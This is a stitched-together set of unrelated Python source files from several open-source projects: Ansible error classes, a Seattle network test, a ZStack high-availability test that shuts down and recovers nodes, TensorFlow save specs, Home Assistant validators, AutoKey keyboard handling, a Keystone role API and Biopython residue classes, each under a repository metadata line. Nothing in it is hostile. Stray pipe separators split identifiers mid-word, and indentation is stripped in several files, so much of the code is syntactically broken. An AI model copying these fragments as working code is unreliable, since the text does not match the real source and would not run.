    Where "obj" is some subclass of ansible.parsing.yaml.objects.AnsibleBaseYAMLObject,
    which should be returned by the DataLoader() class.
    '''

    def __init__(self, message, obj=None, show_content=True):
        # we import this here to prevent an import loop problem,
        # since the objects code also imports ansible.errors
        from ansible.parsing.yaml.objects import AnsibleBaseYAMLObject

        self._obj = obj
        self._show_content = show_content
        if obj and isinstance(obj, AnsibleBaseYAMLObject):
            extended_error = self._get_extended_error()
            if extended_error:
                self.message = 'ERROR! %s\n\n%s' % (message, extended_error)
            else:
                # BUGFIX: previously no message was assigned on this branch,
                # so __str__/__repr__ raised AttributeError whenever the
                # extended error text came back empty.
                self.message = 'ERROR! %s' % message
        else:
            self.message = 'ERROR! %s' % message

    def __str__(self):
        return self.message

    def __repr__(self):
        return self.message

    def _get_error_lines_from_file(self, file_name, line_number):
        '''
        Returns the line in the file which corresponds to the reported error
        location, as well as the line preceding it (if the error did not
        occur on the first line), to provide context to the error.
        '''

        target_line = ''
        prev_line = ''

        with open(file_name, 'r') as f:
            lines = f.readlines()

            # May raise IndexError; the caller catches it.
            target_line = lines[line_number]
            if line_number > 0:
                prev_line = lines[line_number - 1]

        return (target_line, prev_line)

    def _get_extended_error(self):
        '''
        Given an object reporting the location of the exception in a file, return
        detailed information regarding it including:

          * the line which caused the error as well as the one preceding it
          * causes and suggested remedies for common syntax errors

        If this error was created with show_content=False, the reporting of content
        is suppressed, as the file contents may be sensitive (ie. vault data).
        '''

        error_message = ''

        try:
            (src_file, line_number, col_number) = self._obj.ansible_pos
            error_message += YAML_POSITION_DETAILS % (src_file, line_number, col_number)
            if src_file not in ('<string>', '<unicode>') and self._show_content:
                # ansible_pos is 1-based; the file lines list is 0-based.
                (target_line, prev_line) = self._get_error_lines_from_file(src_file, line_number - 1)
                if target_line:
                    stripped_line = target_line.replace(" ","")
                    arrow_line = (" " * (col_number-1)) + "^ here"
                    #header_line = ("=" * 73)
                    error_message += "\nThe offending line appears to be:\n\n%s\n%s\n%s\n" % (prev_line.rstrip(), target_line.rstrip(), arrow_line)

                    # common error/remediation checking here:
                    # check for unquoted vars starting lines
                    if ('{{' in target_line and '}}' in target_line) and ('"{{' not in target_line or "'{{" not in target_line):
                        error_message += YAML_COMMON_UNQUOTED_VARIABLE_ERROR
                    # check for common dictionary mistakes
                    elif ":{{" in stripped_line and "}}" in stripped_line:
                        error_message += YAML_COMMON_DICT_ERROR
                    # check for common unquoted colon mistakes
                    elif len(target_line) and len(target_line) > 1 and len(target_line) > col_number and target_line[col_number] == ":" and target_line.count(':') > 1:
                        error_message += YAML_COMMON_UNQUOTED_COLON_ERROR
                    # otherwise, check for some common quoting mistakes
                    else:
                        parts = target_line.split(":")
                        if len(parts) > 1:
                            middle = parts[1].strip()
                            match = False
                            unbalanced = False

                            if middle.startswith("'") and not middle.endswith("'"):
                                match = True
                            elif middle.startswith('"') and not middle.endswith('"'):
                                match = True

                            # NOTE(review): due to and/or precedence this is True
                            # whenever target_line has more than two double quotes,
                            # regardless of the other clauses — confirm whether
                            # parentheses were intended around the 'or'.
                            if len(middle) > 0 and middle[0] in [ '"', "'" ] and middle[-1] in [ '"', "'" ] and target_line.count("'") > 2 or target_line.count('"') > 2:
                                unbalanced = True

                            if match:
                                error_message += YAML_COMMON_PARTIALLY_QUOTED_LINE_ERROR
                            if unbalanced:
                                error_message += YAML_COMMON_UNBALANCED_QUOTES_ERROR

        except (IOError, TypeError):
            error_message += '\n(could not open file to display line)'
        except IndexError:
            error_message += '\n(specified line no longer in file, maybe it changed?)'

        return error_message
class AnsibleParserError(AnsibleError):
''' something was detected early that is wrong about a playbook or data file '''
pass
class AnsibleInternalError(AnsibleError):
''' internal safeguards tripped, something happened in the code that should never happen '''
pass
class AnsibleRuntimeError(AnsibleError):
''' ansible had a problem while running a playbook '''
pass
class AnsibleModuleError(AnsibleRuntimeError):
''' a module failed somehow '''
pass
class AnsibleConnectionFailure(AnsibleRuntimeError):
''' the transport / connection_plugin had a fatal error '''
pass
class AnsibleFilterError(AnsibleRuntimeError):
''' a templating failure '''
pass
class AnsibleUndefinedVariable(AnsibleRuntimeError):
''' a templating failure '''
pass
|
sburnett/seattle | repy/tests/ut_repytests_veryslownetsend-testrecv.py | Python | mit | 382 | 0.065445 | #pragma out
#pragma repy restri | ctions.veryslownetsend
def foo(ip,port,sock, mainch, ch):
data = sock.recv(1000)
print ip,port,data
stopcomm(ch)
stopcomm(mainch)
if callfunc == 'initialize':
ip = getmyip()
waitforconn(ip,<connport>,foo)
sleep(.1)
csock = openconn(ip,<connport>)
csock.send( | 'Hello, this is too long for such a short time')
sleep(.5)
exitall()
|
zstackorg/zstack-woodpecker | integrationtest/vm/ha/test_all_nodes_recovery_with_one_cmd_create_vm.py | Python | apache-2.0 | 1,972 | 0.005578 | '''
Integration Test for creating KVM VM with all nodes shutdown and recovered.
@author: Quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import test_stub
import time
import os
vm = None
def test():
global vm
cmd = "init 0"
host_username = os.environ.get('nodeUserName')
host_password = os.environ.get('nodePassword')
zstack_ha_vip = os.environ.get('zstackHaVip')
node1_ip = os.environ.get('node1Ip')
test_util.test_logger("shutdown node: %s" % (node1_ip))
rsp = test_lib.lib_execute_ssh_cmd(node1_ip, host_username, host_password, cmd, 180)
node2_ip = os.environ.get('node2Ip')
test_util.test_logger("shutdown node: %s" % (node2_ip))
rsp = test_lib.lib_execute_ssh_cmd(node2_ip, host_username, host_password, cmd, 180)
test_util.test_logger("recover node: %s" % (node1_ip))
os.system('bash -ex %s %s' % (os.environ.get('nodeRecoverScript'), node1_ip))
test_util.test_logger("recover node: %s" % (node2_ip))
os.system('bash -ex %s %s' % (os.environ.get('nodeRecoverScript'), node2_ip))
cmd = "zstack-ctl recover_ha"
rsp = test_lib.lib_execute_ssh_cmd(node1_ip, host_username, host_password, cmd, 180)
if not rsp:
rsp = test_lib.lib_execute_ssh_cmd(node2_ip, host_username, host_password, cmd, 180)
time.sleep(180)
test_stub.exercise_connection(600)
| vm = test_stub.create_basic_vm()
vm.check()
vm.destroy()
test_util.test_pass('After Recover Node with One command, Create VM Test Success')
#Will be called | only if exception happens in test().
def error_cleanup():
global vm
if vm:
try:
vm.destroy()
except:
pass
|
karllessard/tensorflow | tensorflow/python/training/saving/saveable_object.py | Python | apache-2.0 | 3,646 | 0.004663 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIN | D, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================== | =========
"""Types for specifying saving and loading behavior."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class SaveSpec(object):
"""Class used to describe tensor slices that need to be saved."""
def __init__(self, tensor, slice_spec, name, dtype=None, device=None):
"""Creates a `SaveSpec` object.
Args:
tensor: the tensor to save or callable that produces a tensor to save.
If the value is `None`, the `SaveSpec` is ignored.
slice_spec: the slice to be saved. See `Variable.SaveSliceInfo`.
name: the name to save the tensor under.
dtype: The data type of the Tensor. Required if `tensor` is callable.
Used for error checking in the restore op.
device: The device generating and consuming this tensor. Required if
`tensor` is callable. Used to group objects to save by device.
"""
self._tensor = tensor
self.slice_spec = slice_spec
self.name = name
if callable(self._tensor):
if dtype is None or device is None:
raise AssertionError(
"When passing a callable `tensor` to a SaveSpec, an explicit "
"dtype and device must be provided.")
self.dtype = dtype
self.device = device
else:
self.dtype = tensor.dtype
if device is not None:
self.device = device
else:
self.device = tensor.device
@property
def tensor(self):
return self._tensor() if callable(self._tensor) else self._tensor
class SaveableObject(object):
"""Base class for saving and restoring saveable objects."""
def __init__(self, op, specs, name):
"""Creates a `SaveableObject` object.
Args:
op: the "producer" object that this class wraps; it produces a list of
tensors to save. E.g., a "Variable" object saving its backing tensor.
specs: a list of SaveSpec, each element of which describes one tensor to
save under this object. All Tensors must be on the same device.
name: the name to save the object under.
"""
self.op = op
self.specs = specs
self.name = name
@property
def optional_restore(self):
"""A hint to restore assertions that this object is optional."""
return False # Default to required
@property
def device(self):
"""The device for SaveSpec Tensors."""
return self.specs[0].device
def restore(self, restored_tensors, restored_shapes):
"""Restores this object from 'restored_tensors'.
Args:
restored_tensors: the tensors that were loaded from a checkpoint
restored_shapes: the shapes this object should conform to after
restore, or None.
Returns:
An operation that restores the state of the object.
Raises:
ValueError: If the object cannot be restored using the provided
parameters.
"""
# pylint: disable=unused-argument
raise ValueError("Calling an abstract method.")
|
HydrelioxGitHub/home-assistant | homeassistant/helpers/config_validation.py | Python | apache-2.0 | 26,479 | 0 | """Helpers for config validation using voluptuous."""
import inspect
import logging
import os
import re
from datetime import (timedelta, datetime as datetime_sys,
time as time_sys, date as date_sys)
from socket import _GLOBAL_DEFAULT_TIMEOUT
from typing import Any, Union, TypeVar, Callable, Sequence, Dict, Optional
from urllib.parse import urlparse
import voluptuous as vol
from pkg_resources import parse_version
import homeassistant.util.dt as dt_util
from homeassistant.const import (
CONF_PLATFORM, CONF_SCAN_INTERVAL, TEMP_CELSIUS, TEMP_FAHRENHEIT,
CONF_ALIAS, CONF_ENTITY_ID, CONF_VALUE_TEMPLATE, WEEKDAYS,
CONF_CONDITION, CONF_BELOW, CONF_ABOVE, CONF_TIMEOUT, SUN_EVENT_SUNSET,
SUN_EVENT_SUNRISE, CONF_UNIT_SYSTEM_IMPERIAL, CONF_UNIT_SYSTEM_METRIC,
ENTITY_MATCH_ALL, CONF_ENTITY_NAMESPACE, __version__)
from homeassistant.core import valid_entity_id, split_entity_id
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import template as template_helper
from homeassistant.helpers.logging import KeywordStyleAdapter
from homeassistant.util import slugify as util_slugify
# pylint: disable=invalid-name
TIME_PERIOD_ERROR = "offset {} should be format 'HH:MM' or 'HH:MM:SS'"
OLD_SLUG_VALIDATION = r'^[a-z0-9_]+$'
OLD_ENTITY_ID_VALIDATION = r"^(\w+)\.(\w+)$"
# Keep track of invalid slugs and entity ids found so we can create a
# persistent notification. Rare temporary exception to use a global.
INVALID_SLUGS_FOUND = {}
INVALID_ENTITY_IDS_FOUND = {}
INVALID_EXTRA_KEYS_FOUND = []
# Home Assistant types
byte = vol.All(vol.Coerce(int), vol.Range(min=0, max=255))
small_float = vol.All(vol.Coerce(float), vol.Range(min=0, max=1))
positive_int = vol.All(vol.Coerce(int), vol.Range(min=0))
latitude = vol.All(vol.Coerce(float), vol.Range(min=-90, max=90),
msg='invalid latitude')
longitude = vol.All(vol.Coerce(float), vol.Range(min=-180, max=180),
msg='invalid longitude')
gps = vol.ExactSequence([latitude, longitude])
sun_event = vol.All(vol.Lower, vol.Any(SUN_EVENT_SUNSET, SUN_EVENT_SUNRISE))
port = vol.All(vol.Coerce(int), vol.Range(min=1, max=65535))
# typing typevar
T = TypeVar('T')
# Adapted from:
# https://github.com/alecthomas/voluptuous/issues/115#issuecomment-144464666
def has_at_least_one_key(*keys: str) -> Callable:
"""Validate that at least one key exists."""
def validate(obj: Dict) -> Dict:
"""Test keys exist in dict."""
if not isinstance(obj, dict):
raise vol.Invalid('expected dictionary')
for k in obj.keys():
if k in keys:
return obj
raise vol.Invalid('must contain one of {}.'.format(', '.join(keys)))
return validate
def has_at_most_one_key(*keys: str) -> Callable:
"""Validate that zero keys exist or one key exists."""
def validate(obj: Dict) -> Dict:
"""Test zero keys exist or one key exists in dict."""
if not isinstance(obj, dict):
raise vol.Invalid('expected dictionary')
if len(set(keys) & set(obj)) > 1:
raise vol.Invalid(
'must contain at most one of {}.'.format(', '.join(keys))
)
return obj
return validate
def boolean(value: Any) -> bool:
"""Validate and coerce a boolean value."""
if isinstance(value, str):
value = value.lower()
if value in ('1', 'true', 'yes', 'on', 'enable'):
return True
if value in ('0', 'false', 'no', 'off', 'disable'):
return False
raise vol.Invalid('invalid boolean value {}'.format(value))
return bool(value)
def isdevice(value):
"""Validate that value is a real device."""
try:
os.stat(value)
return str(value)
except OSError:
raise vol.Invalid('No device at {} found'.format(value))
def matches_regex(regex):
"""Validate that the value is a string that matches a regex."""
regex = re.compile(regex)
def validator(value: Any) -> str:
"""Validate that value matches the given regex."""
if not isinstance(value, str):
raise vol.Invalid('not a string value: {}'.format(value))
if not regex.match(value):
raise vol.Invalid('value {} does not match regular expression {}'
.format(value, regex.pattern))
return value
return validator
def is_regex(value):
"""Validate that a string is a valid regular expression."""
try:
r = re.compile(value)
return r
except TypeError:
raise vol.Invalid("value {} is of the wrong type for a regular "
"expression".format(value))
except re.error:
raise vol.Invalid("value {} is not a valid regular expression".format(
value))
def isfile(value: Any) -> str:
"""Validate that the value is an existing file."""
if value is None:
raise vol.Invalid('None is not file')
file_in = os.path.expanduser(str(value))
if not os.path.isfile(file_in):
raise vol.Invalid('not a file')
if not os.access(file_in, os.R_OK):
raise vol.Invalid('file not readable')
return file_in
def isdir(value: Any) -> str:
"""Validate that the value is an existing dir."""
if value is None:
raise vol.Invalid('not a directory')
dir_in = os.path.expanduser(str(value))
if not os.path.isdir(dir_in):
raise vol.Invalid('not a directory')
if not os.access(dir_in, os.R_OK):
raise vol.Invalid('directory not readable')
return dir_in
def ensure_list(value: Union[T, Sequence[T]]) -> Sequence[T]:
"""Wrap value in list if it is not one."""
if value is None:
return []
return value if isinstance(value, list) else [value]
def entity_id(value: Any) -> str:
"""Validate Entity ID."""
value = string(value).lower()
if valid_entity_id(value):
return value
if re.match(OLD_ENTITY_ID_VALIDATION, value):
# To ease the breaking change, we allow old slugs for now
# Remove after 0.94 or 1.0
fixed = '.'.join(util_slugify(part) for part in value.split('.', 1))
INVALID_ENTITY_IDS_FOUND[value] = fixed
logging.getLogger(__name__).warning(
"Found invalid entity_ | id %s, please update with %s. This "
"will become a breaking change.",
value, fixed
)
return value
raise vol.Invalid('Entity ID {} is an invalid entity id'.format(value))
def entity_ids(value: Union[str, Sequence]) -> Sequence[str]:
"""Validate Entity IDs."""
if value is None:
raise vol.Invalid('Entity IDs can n | ot be None')
if isinstance(value, str):
value = [ent_id.strip() for ent_id in value.split(',')]
return [entity_id(ent_id) for ent_id in value]
comp_entity_ids = vol.Any(
vol.All(vol.Lower, ENTITY_MATCH_ALL),
entity_ids
)
def entity_domain(domain: str):
"""Validate that entity belong to domain."""
def validate(value: Any) -> str:
"""Test if entity domain is domain."""
ent_domain = entities_domain(domain)
return ent_domain(value)[0]
return validate
def entities_domain(domain: str):
"""Validate that entities belong to domain."""
def validate(values: Union[str, Sequence]) -> Sequence[str]:
"""Test if entity domain is domain."""
values = entity_ids(values)
for ent_id in values:
if split_entity_id(ent_id)[0] != domain:
raise vol.Invalid(
"Entity ID '{}' does not belong to domain '{}'"
.format(ent_id, domain))
return values
return validate
def enum(enumClass):
"""Create validator for specified enum."""
return vol.All(vol.In(enumClass.__members__), enumClass.__getitem__)
def icon(value):
"""Validate icon."""
value = str(value)
if ':' in value:
return value
raise vol.Invalid('Icons should be specifed on the form "prefix:name"')
time_period_dict = vol.All(
dict, vol.Schema({
'days': vol.Coerce(int),
'hours': vol.Coerce(int),
'mi |
guoci/autokey-py3 | lib/autokey/iomediator/_iomediator.py | Python | gpl-3.0 | 9,297 | 0.00484 | import threading
import queue
import logging
from ..configmanager import ConfigManager
from ..configmanager_constants import INTERFACE_TYPE
from ..interface import XRecordInterface, AtSpiInterface
from autokey.model import SendMode
from .key import Key
from .constants import X_RECORD_INTERFACE, KEY_SPLIT_RE, MODIFIERS, HELD_MODIFIERS
CURRENT_INTERFACE = None
_logger = logging.getLogger("iomediator")
class IoMediator(threading.Thread):
"""
The IoMediator is responsible for tracking the state of modifier keys and
interfacing with the various Interface classes to obtain the correct
characters to pass to the expansion service.
This class must not store or maintain any configuration details.
"""
# List of targets interested in receiving keypress, hotkey and mouse events
listeners = []
def __init__(self, service):
threading.Thread.__init__(self, name="KeypressHandler-thread")
self.queue = queue.Queue()
self.listeners.append(service)
self.interfaceType = ConfigManager.SETTINGS[INTERFACE_TYPE]
# Modifier tracking
self.modifiers = {
Key.CONTROL: False,
Key.ALT: False,
Key.ALT_GR: False,
Key.SHIFT: False,
Key.SUPER: False,
Key.HYPER: False,
Key.META: False,
Key.CAPSLOCK: False,
Key.NUMLOCK: False
}
if self.interfaceType == X_RECORD_INTERFACE:
self.interface = XRecordInterface(self, service.app)
else:
self.interface = AtSpiInterface(self, service.app)
global CURRENT_INTERFACE
CURRENT_INTERFACE = self.interface
_logger.info("Created IoMediator instance, current interface is: {}".format(CURRENT_INTERFACE))
def shutdown(self):
_logger.debug("IoMediator shutting down")
self.interface.cancel()
self.queue.put_nowait((None, None))
_logger.debug("Waiting for IoMediator thread to end")
self.join()
_logger.debug("IoMediator shutdown completed")
# Callback methods for Interfaces ----
def set_modifier_state(self, modifier, state):
_logger.debug("Set modifier %s to %r", modifier, state)
self.modifiers[modifier] = state
def handle_modifier_dow | n(self, modifier):
"""
Updates the state of the given modifier key to 'pressed'
| """
_logger.debug("%s pressed", modifier)
if modifier in (Key.CAPSLOCK, Key.NUMLOCK):
if self.modifiers[modifier]:
self.modifiers[modifier] = False
else:
self.modifiers[modifier] = True
else:
self.modifiers[modifier] = True
def handle_modifier_up(self, modifier):
"""
Updates the state of the given modifier key to 'released'.
"""
_logger.debug("%s released", modifier)
# Caps and num lock are handled on key down only
if modifier not in (Key.CAPSLOCK, Key.NUMLOCK):
self.modifiers[modifier] = False
def handle_keypress(self, keyCode, window_info):
"""
Looks up the character for the given key code, applying any
modifiers currently in effect, and passes it to the expansion service.
"""
self.queue.put_nowait((keyCode, window_info))
def run(self):
while True:
keyCode, window_info = self.queue.get()
if keyCode is None and window_info is None:
break
numLock = self.modifiers[Key.NUMLOCK]
modifiers = self.__getModifiersOn()
shifted = self.modifiers[Key.CAPSLOCK] ^ self.modifiers[Key.SHIFT]
key = self.interface.lookup_string(keyCode, shifted, numLock, self.modifiers[Key.ALT_GR])
rawKey = self.interface.lookup_string(keyCode, False, False, False)
for target in self.listeners:
target.handle_keypress(rawKey, modifiers, key, window_info)
self.queue.task_done()
def handle_mouse_click(self, rootX, rootY, relX, relY, button, windowInfo):
for target in self.listeners:
target.handle_mouseclick(rootX, rootY, relX, relY, button, windowInfo)
# Methods for expansion service ----
def send_string(self, string: str):
"""
Sends the given string for output.
"""
if not string:
return
string = string.replace('\n', "<enter>")
string = string.replace('\t', "<tab>")
_logger.debug("Send via event interface")
self.__clearModifiers()
modifiers = []
for section in KEY_SPLIT_RE.split(string):
if len(section) > 0:
if Key.is_key(section[:-1]) and section[-1] == '+' and section[:-1] in MODIFIERS:
# Section is a modifier application (modifier followed by '+')
modifiers.append(section[:-1])
else:
if len(modifiers) > 0:
# Modifiers ready for application - send modified key
if Key.is_key(section):
self.interface.send_modified_key(section, modifiers)
modifiers = []
else:
self.interface.send_modified_key(section[0], modifiers)
if len(section) > 1:
self.interface.send_string(section[1:])
modifiers = []
else:
# Normal string/key operation
if Key.is_key(section):
self.interface.send_key(section)
else:
self.interface.send_string(section)
self.__reapplyModifiers()
def paste_string(self, string, pasteCommand: SendMode):
if len(string) > 0:
_logger.debug("Send via clipboard")
self.interface.send_string_clipboard(string, pasteCommand)
def remove_string(self, string):
backspaces = -1 # Start from -1 to discount the backspace already pressed by the user
for section in KEY_SPLIT_RE.split(string):
if Key.is_key(section):
# TODO: Only a subset of keys defined in Key are printable, thus require a backspace.
# Many keys are not printable, like the modifier keys or F-Keys.
# If the current key is a modifier, it may affect the printability of the next character.
# For example, if section == <alt>, and the next section begins with "+a", both the "+" and "a" are not
# printable, because both belong to the keyboard combination "<alt>+a"
backspaces += 1
else:
backspaces += len(section)
self.send_backspace(backspaces)
def send_key(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.send_key(keyName)
def press_key(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.fake_keydown(keyName)
def release_key(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.fake_keyup(keyName)
def fake_keypress(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.fake_keypress(keyName)
def send_left(self, count):
"""
Sends the given number of left key presses.
"""
for i in range(count):
self.interface.send_key(Key.LEFT)
def send_right(self, count):
for i in range(count):
self.interface.send_key(Key.RIGHT)
def send_up(self, count):
"""
Sends the gi |
dbmi-pitt/DIKB-Micropublication | scripts/mp-scripts/Bio/PDB/Residue.py | Python | apache-2.0 | 4,886 | 0.010847 | # Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# My Stuff
from PDBExceptions import PDBConstructionException
from Entity import Entity, DisorderedEntityWrapper
__doc__="Residue class, used by Structure objects."
_atom_name_dict={}
_atom_name_dict["N"]=1
_atom_name_dict["CA"]=2
_atom_name_dict["C"]=3
_atom_name_dict["O"]=4
class Residue(Entity):
"""
Represents a residue. A Residue object stores atoms.
"""
def __init__(self, id, resname, segid):
self.level="R"
self.disordered=0
self.resname=resname
self.segid=segid
Entity.__init__(self, id)
# Special methods
def __repr__(self):
resname=self.get_resname()
hetflag, resseq | , icode=self.get_id()
full_id=(resname, hetflag, resseq, icode)
return "<Residue %s het=%s resseq=%s icode=%s>" % full_id
# Private methods
def _sort(self, a1, a2):
"""Sort the Atom objects.
Atoms are sorted alphabetically according to their name,
but N, CA, C, O always come f | irst.
Arguments:
o a1, a2 - Atom objects
"""
name1=a1.get_name()
name2=a2.get_name()
if name1==name2:
return(cmp(a1.get_altloc(), a2.get_altloc()))
if _atom_name_dict.has_key(name1):
index1=_atom_name_dict[name1]
else:
index1=None
if _atom_name_dict.has_key(name2):
index2=_atom_name_dict[name2]
else:
index2=None
if index1 and index2:
return cmp(index1, index2)
if index1:
return -1
if index2:
return 1
return cmp(name1, name2)
# Public methods
def add(self, atom):
"""Add an Atom object.
Checks for adding duplicate atoms, and raises a
PDBConstructionException if so.
"""
atom_id=atom.get_id()
if self.has_id(atom_id):
raise PDBConstructionException, "Atom %s defined twice in residue %s" % (atom_id, self)
Entity.add(self, atom)
def sort(self):
self.child_list.sort(self._sort)
def flag_disordered(self):
"Set the disordered flag."
self.disordered=1
def is_disordered(self):
"Return 1 if the residue contains disordered atoms."
return self.disordered
def get_resname(self):
return self.resname
def get_unpacked_list(self):
"""
Returns the list of all atoms, unpack DisorderedAtoms."
"""
atom_list=self.get_list()
undisordered_atom_list=[]
for atom in atom_list:
if atom.is_disordered():
undisordered_atom_list=(undisordered_atom_list+ atom.disordered_get_list())
else:
undisordered_atom_list.append(atom)
return undisordered_atom_list
def get_segid(self):
return self.segid
class DisorderedResidue(DisorderedEntityWrapper):
"""
DisorderedResidue is a wrapper around two or more Residue objects. It is
used to represent point mutations (e.g. there is a Ser 60 and a Cys 60 residue,
each with 50 % occupancy).
"""
def __init__(self, id):
DisorderedEntityWrapper.__init__(self, id)
def __repr__(self):
resname=self.get_resname()
hetflag, resseq, icode=self.get_id()
full_id=(resname, hetflag, resseq, icode)
return "<DisorderedResidue %s het=%s resseq=%i icode=%s>" % full_id
def add(self, atom):
residue=self.disordered_get()
if not atom.is_disordered()==2:
# Atoms in disordered residues should have non-blanc
# altlocs, and are thus represented by DisorderedAtom objects.
resname=residue.get_resname()
het, resseq, icode=residue.get_id()
# add atom anyway, if PDBParser ignores exception the atom will be part of the residue
residue.add(atom)
raise PDBConstructionException, "Blank altlocs in duplicate residue %s (%s, %i, %s)" % (resname, het, resseq, icode)
residue.add(atom)
def sort(self):
"Sort the atoms in the child Residue objects."
for residue in self.disordered_get_list():
residue.sort()
def disordered_add(self, residue):
"""Add a residue object and use its resname as key.
Arguments:
o residue - Residue object
"""
resname=residue.get_resname()
# add chain parent to residue
chain=self.get_parent()
residue.set_parent(chain)
assert(not self.disordered_has_id(resname))
self[resname]=residue
self.disordered_select(resname)
|
figo-connect/schwifty | schwifty/__init__.py | Python | mit | 248 | 0 | try:
from importlib.metadata import version
except ImportError:
from importlib_metadata import version # type: | ignore
from schwifty.bic import BIC
from schwifty. | iban import IBAN
__all__ = ["IBAN", "BIC"]
__version__ = version(__name__)
|
genius1611/Keystone | keystone/backends/sqlalchemy/api/role.py | Python | apache-2.0 | 8,044 | 0.002362 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystone.backends.sqlalchemy import get_session, models
from keystone.backends.api import BaseRoleAPI
class RoleAPI(BaseRoleAPI):
# pylint: disable=W0221
def create(self, values):
role = models.Role()
role.update(values)
role.save()
return role
def delete(self, id, session=None):
if not session:
session = get_session()
with session.begin():
role = self.get(id, session)
session.delete(role)
def get(self, id, session=None):
if not session:
session = get_session()
return session.query(models.Role).filter_by(id=id).first()
def get_by_name(self, name, session=None):
if not session:
session = get_session()
return session.query(models.Role).filter_by(name=name).first()
def get_by_service(self, service_id, session=None):
if not session:
session = get_session()
result = session.query(models.Role).\
filter_by(service_id=service_id).all()
return result
def get_all(self, session=None):
if not session:
session = get_session()
return session.query(models.Role).all()
def get_page(self, marker, limit, session=None):
if not session:
session = get_session()
if marker:
return session.query(models.Role).filter("id>:marker").params(\
marker='%s' % marker).order_by(\
models.Role.id.desc()).limit(limit).all()
else:
return session.query(models.Role).order_by(\
models.Role.id.desc()).limit(limit).all()
def ref_get_page(self, marker, limit, user_id, tenant_id, session=None):
if not session:
session = get_session()
query = session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id)
if tenant_id:
query = query.filter_by(tenant_id=tenant_id)
else:
query = query.filter("tenant_id is null")
if marker:
return query.filter("id>:marker").params(\
marker='%s' % marker).order_by(\
models.UserRoleAssociation.id.desc()).limit(limit).all()
else:
return query.order_by(\
models.UserRoleAssociation.id.desc()).limit(limit).all()
def ref_get_all_global_roles(self, user_id, session=None):
if not session:
session = get_session()
return session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter("tenant_id is null").all()
def ref_get_all_tenant_roles(self, user_id, tenant_id, session=None):
if not session:
session = get_session()
return session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter_by(tenant_id=tenant_id).all()
def ref_get(self, id, session=None):
if not session:
session = get_session()
result = session.query(models.UserRoleAssociation).filter_by(id=id).\
first()
return result
def ref_delete(self, id, session=None):
if not session:
session = get_session()
with session.begin():
role_ref = self.ref_get(id, session)
session.delete(role_ref)
def get_page_markers(self, marker, limit, session=None):
if not session:
session = get_session()
first = session.query(models.Role).order_by(\
models.Role.id).first()
last = session.query(models.Role).order_by(\
models.Role.id.desc()).first()
if first is None:
return (None, None)
if marker is None:
marker = first.id
next_page = session.query(models.Role).filter("id > :marker").params(\
marker='%s' % marker).order_by(\
models.Role.id).limit(limit).all()
prev_page = session.query(models.Role).filter("id < :marker").params(\
marker='%s' % marker).order_by(\
models.Role.id.desc()).limit(int(limit)).all()
if len(next_page) == 0:
next_page = last
else:
for | t in next_page:
next_page = t
if len(prev_page) == 0:
prev_page = first
else:
for t in prev_page:
prev_page = t
if prev_page.id == marker:
| prev_page = None
else:
prev_page = prev_page.id
if next_page.id == last.id:
next_page = None
else:
next_page = next_page.id
return (prev_page, next_page)
def ref_get_page_markers(self, user_id, tenant_id, marker,
limit, session=None):
if not session:
session = get_session()
query = session.query(models.UserRoleAssociation).filter_by(\
user_id=user_id)
if tenant_id:
query = query.filter_by(tenant_id=tenant_id)
else:
query = query.filter("tenant_id is null")
first = query.order_by(\
models.UserRoleAssociation.id).first()
last = query.order_by(\
models.UserRoleAssociation.id.desc()).first()
if first is None:
return (None, None)
if marker is None:
marker = first.id
next_page = query.\
filter("id > :marker").\
params(marker='%s' % marker).\
order_by(models.UserRoleAssociation.id).\
limit(limit).\
all()
prev_page = query.\
filter("id < :marker").\
params(marker='%s' % marker).\
order_by(models.UserRoleAssociation.id.desc()).\
limit(int(limit)).\
all()
if len(next_page) == 0:
next_page = last
else:
for t in next_page:
next_page = t
if len(prev_page) == 0:
prev_page = first
else:
for t in prev_page:
prev_page = t
if prev_page.id == marker:
prev_page = None
else:
prev_page = prev_page.id
if next_page.id == last.id:
next_page = None
else:
next_page = next_page.id
return (prev_page, next_page)
def ref_get_by_role(self, role_id, session=None):
if not session:
session = get_session()
result = session.query(models.UserRoleAssociation).\
filter_by(role_id=role_id).all()
return result
def ref_get_by_user(self, user_id, role_id, tenant_id, session=None):
if not session:
session = get_session()
if tenant_id is None:
result = session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter("tenant_id is null").\
filter_by(role_id=role_id).first()
else:
result = session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter_by(tenant_id=tenant_id).\
filter_by(role_id=role_id).first()
return result
def get():
return RoleAPI()
|
Azure/azure-sdk-for-python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2021_01_15/operations/_domain_registration_provider_operations.py | Python | mit | 5,798 | 0.004484 | # coding=utf-8
# --------------------------------------------------------------------------
